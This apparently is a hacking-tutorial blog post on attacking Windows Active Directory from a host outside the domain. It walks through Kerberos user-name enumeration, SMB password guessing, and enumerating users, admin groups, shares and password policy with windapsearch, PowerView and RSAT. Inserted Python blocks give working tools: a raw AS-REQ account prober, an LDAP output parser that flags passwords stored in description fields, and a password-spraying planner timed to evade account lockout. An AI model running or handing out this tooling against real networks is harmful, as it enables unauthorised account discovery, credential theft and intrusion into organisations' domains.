Hacking Book | Free Online Hacking Learning


From brute-force enumeration of users to collecting all domain information

Posted by truschel at 2020-02-27

During intranet penetration we often run into a Windows domain environment. When we obtain control of an intranet host, that host may not be joined to the domain, so we cannot use it to query domain information directly. How do we proceed with domain penetration from there?

We can obtain the credentials of an ordinary domain user through phishing, spoofing, information gathering, password guessing and so on. Let's start with how to brute-force the user names in the domain.

Brute-force enumeration of user names

If we know nothing about the domain, hold no host inside it and have no domain account, we can still enumerate account names in the domain with a dictionary.

User name enumeration works because the KDC answers an AS-REQ that carries no pre-authentication data with a different Kerberos error depending on whether the principal exists: KDC_ERR_C_PRINCIPAL_UNKNOWN for an unknown name, KDC_ERR_PREAUTH_REQUIRED for an existing account (and KDC_ERR_CLIENT_REVOKED for an account that exists but is disabled or locked out). Because no password is ever submitted, these probes do not count against the account lockout threshold. The error information looks like this:

Here are a few tools to do this.


KerbGuess

Download address:


The enumeration command is as follows:

java -jar kerbguess.jar -r [domain] -d [user list] -s [DC IP]

Nmap krb5-enum-users NSE Script

Usage:

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='[domain]',userdb=[user list] [DC IP]

Metasploit's auxiliary/gather/kerberos_enumusers module:

The module information is as follows:


Using this module, we need to provide three options:

1. Domain name (DOMAIN)

2. Domain controller IP (RHOSTS)

3. User list (USER_FILE)

The result of running the module is shown in the figure:

After the run, the results are stored in the Metasploit database, and the users that were found can be listed with the creds command.
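To make the mechanism behind all three tools concrete, here is an added example (not code from the original post, KerbGuess, nmap or Metasploit) that builds a pre-authentication-less AS-REQ by hand, sends it to TCP/88 and classifies the KDC's reply by its Kerberos error code. The DER encoder covers only the fields an AS-REQ needs, the kdc-options bits and etype list are illustrative choices, and build_krb_error() fabricates a minimal KRB-ERROR so the decoder can be exercised offline; the realm is assumed to be the domain's DNS name.

```python
import os
import socket
import struct
import time

# --- minimal DER encoder, only what an AS-REQ needs ---------------------------
def _der_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def tlv(tag, body):
    return bytes([tag]) + _der_len(len(body)) + body

def ctx(n, body):      # context-specific constructed tag [n]
    return tlv(0xA0 | n, body)

def integer(v):        # non-negative INTEGER in minimal two's complement
    return tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))

def gstring(s):        # GeneralString
    return tlv(0x1B, s.encode())

def seq(*items):       # SEQUENCE / SEQUENCE OF
    return tlv(0x30, b"".join(items))

def principal(name_type, parts):
    return seq(ctx(0, integer(name_type)), ctx(1, seq(*[gstring(p) for p in parts])))

def build_as_req(realm, user, nonce=None):
    """AS-REQ (RFC 4120 5.4.1) for user@REALM with no PA-DATA, so no password is sent."""
    realm = realm.upper()                        # Kerberos realms are upper-case
    if nonce is None:
        nonce = int.from_bytes(os.urandom(4), "big") & 0x7FFFFFFF
    till = time.strftime("%Y%m%d%H%M%SZ", time.gmtime(time.time() + 86400))
    body = seq(
        ctx(0, tlv(0x03, b"\x00\x40\x80\x00\x10")),        # kdc-options: forwardable, renewable, renewable-ok
        ctx(1, principal(1, [user])),                        # cname, NT-PRINCIPAL
        ctx(2, gstring(realm)),
        ctx(3, principal(2, ["krbtgt", realm])),             # sname, NT-SRV-INST
        ctx(5, tlv(0x18, till.encode())),                    # till, GeneralizedTime
        ctx(7, integer(nonce)),
        ctx(8, seq(integer(18), integer(17), integer(23))),  # etypes: AES256, AES128, RC4
    )
    return tlv(0x6A, seq(ctx(1, integer(5)), ctx(2, integer(10)), ctx(4, body)))  # APPLICATION 10

# --- decoding the KDC's answer --------------------------------------------------
def der_iter(buf):
    """Yield (tag, body) for each TLV in buf; handles short and long definite lengths."""
    i = 0
    while i < len(buf):
        tag, n = buf[i], buf[i + 1]
        i += 2
        if n & 0x80:
            k = n & 0x7F
            n = int.from_bytes(buf[i:i + k], "big")
            i += k
        yield tag, buf[i:i + n]
        i += n

KRB_ERRORS = {                                   # code: (name, does the principal exist?)
    6: ("KDC_ERR_C_PRINCIPAL_UNKNOWN", False),
    18: ("KDC_ERR_CLIENT_REVOKED", True),         # exists, but disabled or locked out
    25: ("KDC_ERR_PREAUTH_REQUIRED", True),
}

def classify(resp):
    """Map a raw KDC reply to (label, user_exists)."""
    if resp[:1] == b"\x6B":                      # AS-REP (APPLICATION 11): no pre-auth required
        return "AS-REP (AS-REP roastable)", True
    if resp[:1] != b"\x7E":                      # KRB-ERROR is APPLICATION 30
        return "UNEXPECTED", None
    _, krb_error = next(der_iter(resp))
    _, fields = next(der_iter(krb_error))
    for tag, body in der_iter(fields):
        if tag == 0xA6:                          # error-code [6] INTEGER
            code = int.from_bytes(next(der_iter(body))[1], "big", signed=True)
            return KRB_ERRORS.get(code, ("KRB_ERR_%d" % code, None))
    return "MALFORMED", None

def build_krb_error(code):
    """Constructed KRB-ERROR with only pvno, msg-type and error-code, for offline testing."""
    return tlv(0x7E, seq(ctx(0, integer(5)), ctx(1, integer(30)), ctx(6, integer(code))))

def probe(dc_ip, realm, user, timeout=3.0):
    """One AS-REQ over TCP/88 (4-byte big-endian length prefix), classified."""
    req = build_as_req(realm, user)
    with socket.create_connection((dc_ip, 88), timeout=timeout) as s:
        s.sendall(struct.pack(">I", len(req)) + req)
        want = struct.unpack(">I", s.recv(4))[0]
        data = b""
        while len(data) < want:
            chunk = s.recv(want - len(data))
            if not chunk:
                break
            data += chunk
    return classify(data)

def enumerate_users(dc_ip, realm, users):
    """Names the KDC confirmed, e.g. enumerate_users('10.0.0.1', 'mydomain.test', wordlist)."""
    return [u for u in users if probe(dc_ip, realm, u)[1]]
```

An AS-REP instead of an error means the account has "Do not require Kerberos preauthentication" set, which is worth recording separately because such accounts can be AS-REP roasted.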


Enumerate user credentials

You can use Metasploit's auxiliary/scanner/smb/smb_login module to guess passwords for the enumerated users. Unlike the pre-authentication-less Kerberos probes above, every failed SMB logon counts against the account lockout threshold, so check the domain password policy before guessing. The module's help output is as follows:


Get user information in the domain

After the steps above we may hold one or more domain user credentials. At that point we no longer need brute force to obtain user information: with the identity of a domain user we can query the directory directly for the data we want, exactly as a legitimate user would.

The following are our objectives:

1. Get user account

2. Get privilege information (for example membership of the Domain Admins or Remote Desktop Users groups)

3. Enumerate domain password policies

4. Get further attack path

Here are a few tools to meet the above requirements.


windapsearch

Download address:


This tool is written in Python and queries user, group and computer information through the domain controller's LDAP service. The basic command is:

windapsearch --dc-ip [IP_ADDRESS] -u [DOMAIN]\USERNAME -p [PASSWORD] -U

The -U parameter retrieves all users in the domain, for example:


windapsearch --dc-ip [IP_ADDRESS] -u mydomain\ops -p Pa55word -U | grep cn: | cut -d " " -f 2

We use grep and cut to trim the output down to the names. Note that cut on the space character keeps only the first word, so a name that contains spaces (such as "Remote Desktop Users" or "Jane Doe") is truncated; for multi-word names use the whole line instead. The results are as follows:

Use the --da parameter to get the members of the Domain Admins group:

windapsearch --dc-ip [IP_ADDRESS] -u mydomain\ops -p Pa55word --da | grep cn: | cut -d " " -f 2

Use the -m parameter to get the members of the Remote Desktop Users group:


windapsearch --dc-ip [IP_ADDRESS] -u mydomain\ops -p Pa55word -m "Remote Desktop Users" | grep CN=
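As an added example (not part of windapsearch or the original post), the following parser turns the LDIF-style "attribute: value" output that the grep/cut pipelines above operate on into structured records. It handles the cases the one-liners get wrong: multi-word names, folded continuation lines, multi-valued attributes such as member, and base64-encoded ("::") values, and it flags description fields that look like they hold a password, a classic attack path. The sample directory entries are constructed for this example.

```python
import base64
import re

# Constructed sample in the LDIF-style form the grep pipelines above consume.
# It deliberately contains multi-word names, a folded line (leading space) and a
# base64 ('::') value, all of which 'cut -d " " -f 2' mishandles.
_B64 = base64.b64encode(b"Temp pw: Summer2020!").decode()
SAMPLE = f"""\
dn: CN=Domain Admins,CN=Users,DC=mydomain,DC=test
cn: Domain Admins
member: CN=Administrator,CN=Users,DC=mydomain,DC=test
member: CN=ops,CN=Users,DC=mydomain,DC=test

dn: CN=Remote Desktop Users,CN=Builtin,DC=mydomain,DC=test
cn: Remote Desktop Users
member: CN=Jane Doe,OU=Staff,
 DC=mydomain,DC=test

dn: CN=Jane Doe,OU=Staff,DC=mydomain,DC=test
cn: Jane Doe
sAMAccountName: jdoe
description:: {_B64}
"""

def parse_ldif(text):
    """One {attribute: [values]} dict per entry; attribute names are lower-cased
    because LDAP treats them case-insensitively."""
    entries, current = [], {}
    for line in re.sub(r"\r?\n ", "", text).splitlines():   # unfold continuation lines
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):                            # 'attr:: <base64>'
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(attr.strip().lower(), []).append(value)
    if current:
        entries.append(current)
    return entries

def leaf_cn(dn):
    """Leading CN of a DN, tolerating escaped commas (CN=Doe\\, Jane,...)."""
    m = re.match(r"(?i)CN=((?:\\.|[^,])*)", dn)
    return m.group(1).replace("\\,", ",") if m else dn

def values(entries, attr):
    """Every value of attr across all entries, e.g. values(entries, 'sAMAccountName')."""
    return [v for e in entries for v in e.get(attr.lower(), [])]

def group_members(entries, group_cn):
    """Members of the group whose cn matches, reduced from DNs to leaf CNs."""
    for e in entries:
        if e.get("cn", [""])[0].lower() == group_cn.lower():
            return [leaf_cn(dn) for dn in e.get("member", [])]
    return []

def suspicious_descriptions(entries):
    """(cn, description) pairs whose description looks like it holds a credential."""
    return [(e["cn"][0], d) for e in entries for d in e.get("description", [])
            if re.search(r"pass|pwd|pw", d, re.I)]

def naive_cut(text):
    """What grep cn: | cut -d ' ' -f 2 produces: every multi-word name is truncated."""
    return [line.split(" ")[1] for line in text.splitlines() if "cn:" in line]
```

Compare naive_cut(SAMPLE), which yields Domain, Remote and Jane, with group_members(parse_ldif(SAMPLE), "Remote Desktop Users"), which yields the full name.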


PowerView (PowerSploit)

Everyone is familiar with this tool and many people use it. Blog:


On a host that is not joined to the domain we use runas with /netonly to start a PowerShell session that presents a domain user's credentials on the network:

runas /netonly /user:mydomain\ops powershell

Enter the password at the prompt. Note that /netonly does not verify the password locally: it is only used when the new process authenticates to a remote system, so a wrong password shows up as failed LDAP or SMB queries later, not as an error from runas:

PowerSploit is already downloaded; its path is as follows:


We import the PowerSploit module:

Import-Module .\PowerSploit.psd1

We use the following command to export domain users:

Get-DomainUser -Domain mydomain.test -DomainController [DC IP] | findstr samaccountname

Use the following command to export the members of the Domain Admins group:

Get-DomainGroupMember -Identity "Domain Admins" -Domain mydomain.test -DomainController [DC IP] | findstr MemberName

Use the following command to export the members of the Remote Desktop Users group:

Get-DomainGroupMember -Identity "Remote Desktop Users" -Domain mydomain.test -DomainController [DC IP] | findstr MemberName

We can also use the identity of the current user to list the shares it can access:

Find-DomainShare -CheckShareAccess -Domain mydomain.test -DomainController [DC IP]

RSAT (Microsoft Remote Server Administration Tools)

Microsoft RSAT exists to let administrators manage Windows servers remotely, and it includes the ActiveDirectory PowerShell module. It is used much like the tool above: first start a PowerShell session with ordinary domain user rights (runas /netonly as shown earlier), then run the following command to read the domain password policy, including the lockout threshold that password guessing has to respect:

Get-ADDefaultDomainPasswordPolicy -Server [DC IP]
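The password policy is what turns the smb_login guessing from the earlier section into something that does not lock every account. The following added example (not from RSAT, Metasploit or the original post) parses the Format-List style output of Get-ADDefaultDomainPasswordPolicy, discards candidate passwords the policy itself would never have accepted, and splits the rest into rounds that stay below LockoutThreshold, waiting one LockoutObservationWindow between rounds so badPwdCount has reset. The policy text is a constructed sample, and the safety margin of two attempts is an assumption.

```python
import re
from dataclasses import dataclass
from datetime import timedelta

# Constructed sample of Get-ADDefaultDomainPasswordPolicy output (Format-List style).
POLICY_TEXT = """\
ComplexityEnabled           : True
DistinguishedName           : DC=mydomain,DC=test
LockoutDuration             : 00:30:00
LockoutObservationWindow    : 00:30:00
LockoutThreshold            : 5
MaxPasswordAge              : 42.00:00:00
MinPasswordAge              : 1.00:00:00
MinPasswordLength           : 7
PasswordHistoryCount        : 24
ReversibleEncryptionEnabled : False
"""

@dataclass
class PasswordPolicy:
    lockout_threshold: int          # 0 means accounts never lock out
    observation_window: timedelta   # failures older than this no longer count
    min_password_length: int
    complexity_enabled: bool

def parse_timespan(s):
    """.NET TimeSpan text: 'hh:mm:ss' or 'd.hh:mm:ss'."""
    days = 0
    if "." in s.split(":")[0]:
        d, s = s.split(".", 1)
        days = int(d)
    h, m, sec = (int(x) for x in s.split(":"))
    return timedelta(days=days, hours=h, minutes=m, seconds=sec)

def parse_policy(text):
    kv = {}
    for line in text.splitlines():
        if ":" in line:
            k, v = line.split(":", 1)
            kv[k.strip()] = v.strip()
    return PasswordPolicy(
        int(kv["LockoutThreshold"]),
        parse_timespan(kv["LockoutObservationWindow"]),
        int(kv["MinPasswordLength"]),
        kv["ComplexityEnabled"].lower() == "true",
    )

def meets_policy(policy, pw):
    """A guess the policy would have rejected at set time cannot be anyone's
    password, yet still burns a lockout attempt, so drop it up front.
    Windows complexity: at least three of upper, lower, digit, symbol."""
    if len(pw) < policy.min_password_length:
        return False
    if not policy.complexity_enabled:
        return True
    classes = sum(bool(re.search(p, pw)) for p in (r"[A-Z]", r"[a-z]", r"\d", r"[^A-Za-z0-9]"))
    return classes >= 3

def spray_plan(policy, passwords, margin=2):
    """Rounds of at most (LockoutThreshold - margin) guesses per account, with a
    full observation window of waiting before every round after the first.
    Returns [(wait_before_round, [passwords]), ...]."""
    usable = [p for p in passwords if meets_policy(policy, p)]
    if policy.lockout_threshold == 0:
        per_round = len(usable) or 1            # no lockout configured
    else:
        per_round = max(1, policy.lockout_threshold - margin)
    rounds = [usable[i:i + per_round] for i in range(0, len(usable), per_round)]
    return [(policy.observation_window if i else timedelta(0), r) for i, r in enumerate(rounds)]

def total_wait(plan):
    """Wall-clock time the plan spends waiting between rounds."""
    return sum((w for w, _ in plan), timedelta(0))
```

With the sample policy (threshold 5, window 30 minutes) and a margin of 2, the plan tries three passwords per account, then sleeps 30 minutes before the next three; a fine-grained password policy (Get-ADFineGrainedPasswordPolicy) can override these values for specific groups, so check for those too.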

We can also use the RSAT graphical console (MMC), again started with runas:


runas /netonly /user:mydomain\ops mmc

In the console, add the Active Directory Users and Computers snap-in to browse the hosts and users in the domain:

Change the domain controller instance to our target:

Let's take a look at the user information in the domain:
